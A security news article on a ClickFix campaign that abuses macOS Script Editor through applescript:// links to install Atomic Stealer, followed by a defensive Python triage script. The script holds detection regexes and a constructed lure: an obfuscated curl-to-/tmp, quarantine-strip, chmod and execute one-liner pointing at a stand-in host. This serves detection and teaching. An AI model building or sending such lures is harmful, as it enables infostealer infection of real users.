Prompt to open Script Editor | Image: Jamf Threat Labs
In the ever-evolving game of digital cat-and-mouse, Jamf Threat Labs has identified a clever adaptation of the notorious “ClickFix” attack strategy. Traditionally, these campaigns trick users into pasting malicious commands into the Terminal, but as security friction increases, threat actors are shifting their sights to a different built-in macOS tool: Script Editor.
This new campaign effectively sidesteps recent macOS security enhancements while maintaining the same dangerous endgame: infecting systems with the Atomic Stealer infostealer.
The hallmark of ClickFix has long been convincing a user to copy and paste a command into the Terminal under the guise of system maintenance. However, Apple introduced a specific security feature in macOS 26.4 that “scans commands pasted into Terminal before they’re executed,” creating a meaningful hurdle for attackers.
As Jamf Threat Labs notes, “when one door closes, attackers find another”. This campaign ditches the Terminal-based entry point entirely, instead leveraging the applescript:// URL scheme to automatically launch the macOS Script Editor.
The attack begins with a familiar social engineering lure, such as a fake browser update or a “fix” for a non-existent system error. When the victim follows the instructions, the following chain unfolds:
- URL scheme invocation: The lure uses a URL beginning with applescript://, which macOS routes to Script Editor, opening it with the attacker's script already loaded; the victim only has to accept the prompt and run it.
- The first stage: The initial script is small and obfuscated, typically using “base64 encoding combined with gzip compression to obscure its contents before execution”.
- The retrieval: Once executed, this first stage runs a curl command to download a second-stage payload, identified as a Mach-O binary, to the /tmp directory.
- Final execution: The script then “removes extended attributes, sets execution permissions and executes” the binary, which Jamf has identified as a recent Atomic Stealer variant. Stripping the extended attributes removes the quarantine flag that Gatekeeper would otherwise check on a freshly downloaded file.
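The chain above, seen from the defender's side. The following Python script is an added example and is not Jamf Threat Labs' code: it takes an applescript:// URL of the kind such a lure hands to macOS, pulls out the embedded script, peels the base64-plus-gzip layer, and flags the post-download steps the write-up lists (curl into /tmp, extended-attribute removal, chmod +x, execution of the dropped file). It assumes the link is formed as applescript://com.apple.scripteditor?action=new&script=..., which is how Script Editor links are conventionally built; the indicator regexes are the author's heuristics, and the lure it builds is constructed for the example, points at the reserved host lure.invalid, and is only decoded, never executed.

```python
"""Triage an applescript:// ClickFix lure without executing it.

Added example, not Jamf Threat Labs' code. Assumptions are marked below.
"""
import base64
import gzip
import re
import urllib.parse

# Heuristic indicators for the post-download steps described in the
# write-up. The patterns are the author's assumptions about how those
# steps look in a shell one-liner.
INDICATORS = {
    "download_to_tmp": re.compile(r"\bcurl\b[^;|&\n]*?\s(?:-o|--output)\s+/tmp/"),
    "xattr_strip": re.compile(r"\bxattr\s+(?:-c|-rc|-d\s+com\.apple\.quarantine)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(?:\+x|[0-7]*[157][0-7]*)\b"),
    "tmp_exec": re.compile(r"(?:^|[;&|]\s*)/tmp/\S+"),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/=]{40,}")


def extract_script(url: str) -> str:
    """Return the script text embedded in an applescript:// URL.

    Assumption: the link is formed as
    applescript://com.apple.scripteditor?action=new&script=<percent-encoded>.
    """
    parts = urllib.parse.urlsplit(url)
    if parts.scheme.lower() != "applescript":
        raise ValueError("not an applescript:// URL")
    params = urllib.parse.parse_qs(parts.query)
    if "script" in params:
        return params["script"][0]
    return urllib.parse.unquote(parts.path)  # fallback: bare script in the path


def unwrap_obfuscation(script: str, max_layers: int = 5):
    """Peel base64 (optionally gzip) layers; return (inner text, layer count)."""
    current, layers = script, 0
    while layers < max_layers:
        match = B64_RUN.search(current)
        if not match:
            break
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
            try:
                raw = gzip.decompress(raw)
            except (OSError, EOFError):
                break
        try:
            current = raw.decode()
        except UnicodeDecodeError:
            break
        layers += 1
    return current, layers


def triage(url: str) -> dict:
    """Decode a lure and report which of the reported steps it contains."""
    decoded, layers = unwrap_obfuscation(extract_script(url))
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(decoded))
    download_and_run = {"download_to_tmp", "tmp_exec"} <= set(hits)
    return {
        "layers": layers,
        "decoded": decoded,
        "indicators": hits,
        "verdict": "suspicious" if download_and_run else "no-match",
    }


def build_sample_lure() -> str:
    """Constructed lure for this example. The inner one-liner mirrors the
    reported chain but points at a reserved .invalid host; it is only
    decoded here, never executed."""
    inner = ("curl -fsSL -o /tmp/update http://lure.invalid/payload; "
             "xattr -c /tmp/update; chmod +x /tmp/update; /tmp/update")
    blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    stage1 = f'do shell script "echo {blob} | base64 -d | gunzip | sh"'
    query = urllib.parse.urlencode({"action": "new", "script": stage1})
    return f"applescript://com.apple.scripteditor?{query}"


if __name__ == "__main__":
    report = triage(build_sample_lure())
    print(f"layers peeled: {report['layers']}")
    print(f"indicators:    {', '.join(report['indicators'])}")
    print(f"verdict:       {report['verdict']}")
    print("decoded script:\n" + report["decoded"])
```

A real lure can be fed in by copying the applescript:// link out of the page source or the proxy log and passing it to triage(); because only base64 and gzip are unwrapped, an attacker who switches to another encoding layer will show up as a script with zero layers peeled and no indicators, which is itself worth reviewing rather than treating as clean.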
By shifting the execution environment, attackers gain two major advantages. First, they avoid the new “paste-and-scan” protections built into the macOS Terminal. Second, they maintain a “familiar delivery mechanism” while quietly changing how and where the malicious command actually runs.
This “small adjustment with a meaningful impact” allows the campaign to remain effective against users who may have been trained to be wary of the Terminal, but see the Script Editor as a more benign system tool.
As the researchers at Jamf conclude, this campaign is a “perfect illustration of the cat-and-mouse” nature of macOS security. By understanding these subtle pivots, users and administrators can stay one step ahead of the next ClickFix adaptation.